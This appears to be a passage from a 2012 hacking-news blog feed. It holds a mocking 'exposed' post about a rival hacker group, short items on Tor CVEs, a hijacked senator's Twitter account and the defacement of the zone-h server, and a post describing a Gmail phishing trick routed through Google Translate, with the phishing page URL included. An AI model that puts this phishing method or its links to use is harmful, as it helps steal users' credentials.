&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAfATVsiLxF8-2CijeBBytTKxohv0RtmtagasUr2BbUzkY3cQiFOOBZHOhEBZUsw7J5agFD7tknmWUxzWYVlXmsUYtrCmz83egkudotIXqIuT12oFK5P_N1YOtvOJYaZyEB05ckBo2WI46/s1600/tgh10.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;544&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAfATVsiLxF8-2CijeBBytTKxohv0RtmtagasUr2BbUzkY3cQiFOOBZHOhEBZUsw7J5agFD7tknmWUxzWYVlXmsUYtrCmz83egkudotIXqIuT12oFK5P_N1YOtvOJYaZyEB05ckBo2WI46/s640/tgh10.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 10 ~ TGH Exposed&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;P4k-Commander&lt;/b&gt;&lt;/u&gt;:-  He claims to be Commander of Pakistan hahahahhahaha Fucker Lamer you  are one of the big no0b i have seen haha you too a IIS Cyber Army member  :p OMG !! you hacked this many sites :p haha but with IIS :P 7 you wany  people to find you hehe ....guys see this pic[Image 11] you will come to  know..that how lame he &amp;amp; TGH is :P&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPn2kYosQJUQiVY7ZLpHPjju9tNu5_YfK3JRg9EcTmCs5INwfIoX7QVbUinmTD-0_zrYQ3OcmE-CBU7RsewzCc5GYgEJmK9Gec5fsij56XWzgJikieqptDYL2LRDs2zedkMMKGHSCJq_-b/s1600/tgh11.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;522&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPn2kYosQJUQiVY7ZLpHPjju9tNu5_YfK3JRg9EcTmCs5INwfIoX7QVbUinmTD-0_zrYQ3OcmE-CBU7RsewzCc5GYgEJmK9Gec5fsij56XWzgJikieqptDYL2LRDs2zedkMMKGHSCJq_-b/s640/tgh11.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 11 ~ TGH Exposed&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: red; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace; text-align: center;&quot;&gt;&lt;u&gt;&lt;b&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: center;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;line-height: 18px; text-align: center;&quot;&gt;OK mY Time is Up !! :D Jai Hind !&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeWnTMWC6PT_JTA6DCjzQrd9I0Lu5Vy8bJTtuxr2qtFf5aUsc81s4HBe-cnGZaOIINH1KyLKn3EoFWlrfQwP9RHDgAry2MbDEHz8dCOvS6KeXX2duBySsNaPW3KgEZGpZKdEg5chNee-j2/s1600/indflg.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;212&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeWnTMWC6PT_JTA6DCjzQrd9I0Lu5Vy8bJTtuxr2qtFf5aUsc81s4HBe-cnGZaOIINH1KyLKn3EoFWlrfQwP9RHDgAry2MbDEHz8dCOvS6KeXX2duBySsNaPW3KgEZGpZKdEg5chNee-j2/s320/indflg.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;u&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;u&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px; text-align: center;&quot;&gt;Link to the page:&lt;/b&gt;&lt;/u&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.zone-h.org/mirror/id/16736617&quot; style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px; text-align: center; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://www.zone-h.org/mirror/id/16736617&lt;/a&gt;&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;u&gt;Original post published on :&lt;/u&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;a href=&quot;http://www.maurihackers.info/2012/01/team-grey-hat-exposed.html&quot;&gt;http://www.maurihackers.info/2012/01/team-grey-hat-exposed.html&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/2878808021747061768/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/team-grey-hat-exposed-iis-exploit-team.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/2878808021747061768'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/2878808021747061768'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/team-grey-hat-exposed-iis-exploit-team.html' title='Team Grey Hat Exposed - The IIS Exploit Team'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKIFwDfA5rL9sdjVnkU19EpCjGUNOpdqwpEiX6u1wsJdzODbe6RhUqht4Z2BWpLEJkYhVuJlKkun82u9q1kT5S4tGAJR-83UtNctZc1C2-zh1S7Ny4oRNDcBOnkkbF3OlfIBQPEsbixmVT/s72-c/tgh+exposed.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-4799918185674462607</id><published>2012-01-24T04:12:00.000-08:00</published><updated>2012-01-24T04:12:11.214-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><category scheme="http://www.blogger.com/atom/ns#" term="Vulnerability"/><title type='text'>Tor Vulnerable to Remote arbitrary code Execution</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0LVgfhLMjh7lSQ5HESj2sILlOX8cPOji783JXtWXICk6B1NAKx1ODmOxPXTUDK-2CzZAGIvGYR3ACcWHiNvsDhqN00a2vDyrIYJb7hhQX5i-L-TqWis0aipvLMuPGHSvMEPMUzk_hkUHK/s1600/Tor+Vulnerable+to+Remote+arbitrary+code+Execution.png&quot; rel=&quot;follow&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Tor+Vulnerable+to+Remote+arbitrary+code+Execution&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0LVgfhLMjh7lSQ5HESj2sILlOX8cPOji783JXtWXICk6B1NAKx1ODmOxPXTUDK-2CzZAGIvGYR3ACcWHiNvsDhqN00a2vDyrIYJb7hhQX5i-L-TqWis0aipvLMuPGHSvMEPMUzk_hkUHK/s1600/Tor+Vulnerable+to+Remote+arbitrary+code+Execution.png&quot; title=&quot;Tor+Vulnerable+to+Remote+arbitrary+code+Execution&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
According to latest &lt;a href=&quot;http://www.gentoo.org/security/en/glsa/glsa-201201-12.xml&quot; rel=&quot;follow&quot;&gt;post&lt;/a&gt; of&amp;nbsp;Gentoo Linux Security Advisory, There are multiple vulnerabilities have been found in &lt;b&gt;TOR&lt;/b&gt;, the most severe ofwhich may allow a remote attacker to execute arbitrary code. &lt;b&gt;TOR&lt;/b&gt; is an implementation of second generation Onion Routing, a connection-oriented anonymizing communication service.&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt; &lt;br /&gt;
Using this Vulnerability remote attacker could possibly execute  arbitrary code or cause a Denial of Service. Furthermore, a remote relay  the user is directly connected to may be able to disclose anonymous  information about that user or enumerate bridges in the user&#39;s  connection.&lt;/div&gt;&lt;div id=&quot;aim25667831995041616147&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;Advisory explain that ,&amp;nbsp;Affected Vulnerable&amp;nbsp;packages are&amp;nbsp;&amp;lt; 0.2.2.35 . M&lt;span style=&quot;text-align: left;&quot;&gt;ultiple vulnerabilities have been discovered in Tor are listed below:&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;*&lt;/b&gt; When configured as client or bridge, Tor uses the same TLS&amp;nbsp;certificate chain for all outgoing connections (&lt;a href=&quot;http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2768&quot; rel=&quot;follow&quot;&gt;CVE-2011-2768)&lt;/a&gt;.&lt;br /&gt;
&lt;b&gt;*&lt;/b&gt; When configured as a bridge, Tor relays can distinguish incoming&amp;nbsp;bridge connections from client connections (&lt;a href=&quot;http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2769&quot; rel=&quot;follow&quot;&gt;CVE-2011-2769&lt;/a&gt;).&lt;br /&gt;
&lt;b&gt;* &lt;/b&gt;An error in or/buffers.c could result in a heap-based buffer overflow&amp;nbsp;(&lt;a href=&quot;http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2778&quot; rel=&quot;follow&quot;&gt;CVE-2011-2778&lt;/a&gt;).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;All Tor users should upgrade to the latest version.&lt;/b&gt; &lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/4799918185674462607/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/tor-vulnerable-to-remote-arbitrary-code.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/4799918185674462607'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/4799918185674462607'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/tor-vulnerable-to-remote-arbitrary-code.html' title='Tor Vulnerable to Remote arbitrary code Execution'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0LVgfhLMjh7lSQ5HESj2sILlOX8cPOji783JXtWXICk6B1NAKx1ODmOxPXTUDK-2CzZAGIvGYR3ACcWHiNvsDhqN00a2vDyrIYJb7hhQX5i-L-TqWis0aipvLMuPGHSvMEPMUzk_hkUHK/s72-c/Tor+Vulnerable+to+Remote+arbitrary+code+Execution.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-2749329156923299372</id><published>2012-01-24T02:11:00.000-08:00</published><updated>2012-01-24T02:11:49.340-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber-Crime"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Twitter"/><title type='text'>U.S. Senator Chuck Grassley&#39;s Twitter account hacked</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi1N3KoZQhCEYisN5vO-QnOQHgFX9DNoZ-0ve5p_FQrlVCgGBUxcELKpKJ_X7xbP5FlF0-KpvBbZDuLHKj3bpDcnVpxUiBRMu0k0FjoVcPN5b0RrKyPgzNyiSSKUAA3kdKtXcG5JkTUEhu/s1600/628x471.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;212&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi1N3KoZQhCEYisN5vO-QnOQHgFX9DNoZ-0ve5p_FQrlVCgGBUxcELKpKJ_X7xbP5FlF0-KpvBbZDuLHKj3bpDcnVpxUiBRMu0k0FjoVcPN5b0RrKyPgzNyiSSKUAA3kdKtXcG5JkTUEhu/s320/628x471.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Twitter Account belong to US Senator Chuck Grassley was hacked and used to&amp;nbsp; launch anti-SOPA messages on Monday.&lt;br /&gt;
&lt;br /&gt;
According to the Reuter &lt;a href=&quot;http://www.reuters.com/article/2012/01/23/us-hacking-senator-grassley-idUSTRE80M28420120123&quot; target=&quot;_blank&quot;&gt;report&lt;/a&gt;, the Hacker tweet around eight bogus tweets when Senator Grassley was on a flight heading from Iowa to Washington. When his staff realized the attack, he immediately called twitter to recover the account.&lt;br /&gt;
&lt;br /&gt;
&quot;Dear Iowans, vote against ACTA, SOPA, and PIPA, because this man, Chuck Grassley, wants YOUR internet censored and all of that BS.&quot; One of fake tweet says.&lt;br /&gt;
&lt;br /&gt;
Grassley was among sponsors of the Protect IP Act, or PIPA, but he withdrew his support last week&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/2749329156923299372/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/us-senator-chuck-grassleys-twitter.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/2749329156923299372'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/2749329156923299372'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/us-senator-chuck-grassleys-twitter.html' title='U.S. Senator Chuck Grassley&#39;s Twitter account hacked'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi1N3KoZQhCEYisN5vO-QnOQHgFX9DNoZ-0ve5p_FQrlVCgGBUxcELKpKJ_X7xbP5FlF0-KpvBbZDuLHKj3bpDcnVpxUiBRMu0k0FjoVcPN5b0RrKyPgzNyiSSKUAA3kdKtXcG5JkTUEhu/s72-c/628x471.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-9145228048362496716</id><published>2012-01-24T02:03:00.000-08:00</published><updated>2012-01-24T02:04:56.139-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><title type='text'>Zone-H server rooted and Website hacked !</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://zone-h.com/images/logo.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://zone-h.com/images/logo.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Zone-H, the Biggest mirror site that hosts hacked sites&#39; defacement mirror, hacked.&amp;nbsp; by HcJ &amp;amp; Cyb3R-1sT &amp;amp; Egyptian.H4x0rZ &amp;amp; Sas-TerrOrisT &amp;amp; H311 c0d3.&lt;br /&gt;
&amp;nbsp;The defacement page is still there. This is interesting hacking news, a defacement hosting server hacked by Hackers.&lt;br /&gt;
&lt;br /&gt;
The mirror can be found here:&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://legend-h.org/mirror/317627/zone-h.com/&quot;&gt;http://legend-h.org/mirror/317627/zone-h.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Hacker Message:&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To be OR not TO be&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style=&quot;color: red;&quot;&gt;Note : It&#39;s Unacceptable when we tried to notify defaced.zone-h.net and found tNote : It&#39;s Unacceptable when we tried to notify defaced.zone-h.net and found this message &quot; nice try&quot; it&#39;s not a try it&#39;s a real! your server rooted, all the websites hacked, all people knew that ! and it&#39;s the third time to hack your websites 2 of them in 2010( 2010/04/02 &amp;gt; brazilian domains + 06/2010 zone-h.com defacement database ),and now ! you should have the courage and allow the defacers to notify your sites, it&#39;s the real courage !&lt;/span&gt;&lt;/blockquote&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/9145228048362496716/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/zone-h-server-rooted-and-website-hacked.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/9145228048362496716'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/9145228048362496716'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/zone-h-server-rooted-and-website-hacked.html' title='Zone-H server rooted and Website hacked !'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-8247026576672135285</id><published>2012-01-23T06:51:00.000-08:00</published><updated>2012-01-23T06:51:52.190-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Google"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><category scheme="http://www.blogger.com/atom/ns#" term="Vulnerability"/><title type='text'>Phishing Google Users with the Help of Google !</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTgYqwyzpwT8QhbYFPcbQ-XerX2IeelWq2C7SDaraXO-jTesRQt6RPImMeKy7e18puQgnt-zAkc1V5vC0Fvq-Jlk9Xl2qvpEXFUf4LAPRURr6ZWpkGHeFy2gSLOFkJ-s79Bi78IQDkZYpL/s1600/Phishing+Google+Users+with+the+Help+of+Google+%2521.png&quot; rel=&quot;follow&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Phishing+Google+Users+with+the+Help+of+Google+%2521&quot; border=&quot;0&quot; height=&quot;266&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTgYqwyzpwT8QhbYFPcbQ-XerX2IeelWq2C7SDaraXO-jTesRQt6RPImMeKy7e18puQgnt-zAkc1V5vC0Fvq-Jlk9Xl2qvpEXFUf4LAPRURr6ZWpkGHeFy2gSLOFkJ-s79Bi78IQDkZYpL/s640/Phishing+Google+Users+with+the+Help+of+Google+%2521.png&quot; title=&quot;Phishing+Google+Users+with+the+Help+of+Google+%2521&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;How Hackers are phishing Gmail/Google users successfully ?&lt;/b&gt;&amp;nbsp;Christy  Philip Mathew, an Information Security Instructor from India shared a  perfect trick with us. He just exploit human psychology. Lets see how:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;He Created a phishing Page of Google and Uploaded to :&amp;nbsp;&lt;a href=&quot;http://www.keepbacktrack.net84.net/&quot; rel=&quot;follow&quot;&gt;http://www.keepbacktrack.net84.net/&lt;/a&gt;&amp;nbsp;. &lt;b&gt;Now How to make this URL legit for Victims ?&lt;/b&gt; Simple, Using&amp;nbsp;Google translation Tool.&lt;/div&gt;&lt;div id=&quot;aim21398791452263810904&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;Google translation has got a  vulnerability that if an attacker plan out translating a fake gmail  login page he would get a perfectly crafted link that can be used for  malicious purposes or Phishing. Above Shown Image the example of this  Trick.&amp;nbsp;New Phishing&amp;nbsp;&lt;a href=&quot;http://translate.googleusercontent.com/translate_c?hl=en&amp;amp;ie=UTF8&amp;amp;prev=_t&amp;amp;rurl=translate.google.com&amp;amp;sl=iw&amp;amp;tl=en&amp;amp;twu=1&amp;amp;u=http://www.keepbacktrack.net84.net/&amp;amp;usg=ALkJrhjnSlUyPnzpOZCgoG2itmjzJ4_G4g&quot; rel=&quot;follow&quot;&gt;URL is Here&lt;/a&gt;&amp;nbsp;after using Translation tool. This is Art of&amp;nbsp;psychological manipulation using Google to Hack Google Users.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/8247026576672135285/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/phishing-google-users-with-help-of.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/8247026576672135285'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/8247026576672135285'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/phishing-google-users-with-help-of.html' title='Phishing Google Users with the Help of Google !'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTgYqwyzpwT8QhbYFPcbQ-XerX2IeelWq2C7SDaraXO-jTesRQt6RPImMeKy7e18puQgnt-zAkc1V5vC0Fvq-Jlk9Xl2qvpEXFUf4LAPRURr6ZWpkGHeFy2gSLOFkJ-s79Bi78IQDkZYpL/s72-c/Phishing+Google+Users+with+the+Help+of+Google+%2521.png" height="72" width="72"/><thr:total>0</thr:total></entry></feed>